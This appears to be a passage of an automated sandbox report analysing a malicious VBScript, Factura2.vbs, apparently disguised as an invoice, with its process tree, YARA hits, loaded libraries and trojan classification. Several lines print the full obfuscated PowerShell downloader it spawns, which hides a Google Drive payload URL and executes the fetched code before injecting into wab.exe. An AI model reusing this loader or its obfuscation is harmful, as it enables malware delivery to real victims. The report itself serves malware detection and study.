Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34896B70	2_2_00007FFD34896B70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F6F258	5_2_04F6F258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F6FB28	5_2_04F6FB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F6EF10	5_2_04F6EF10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07DD9AA8	5_2_07DD9AA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_00A54AD0	10_2_00A54AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_00A53EB8	10_2_00A53EB8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_00A54200	10_2_00A54200
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_00A5F858	10_2_00A5F858
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_00381C5C	12_2_00381C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_003825D3	12_2_003825D3

Java / VBScript file with very long strings (likely obfuscated code)

Source: Factura2.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi32_6136.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@15/10@4/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Merogastrula.Bes

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4jeyehg.lfb.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Command line argument: #v	12_2_00381C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Command line argument: WABOpen	12_2_00381C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Command line argument: #v	12_2_00381C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Command line argument: 58	12_2_00383530

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6136
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: Factura2.vbs

Virustotal: Detection: 16%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
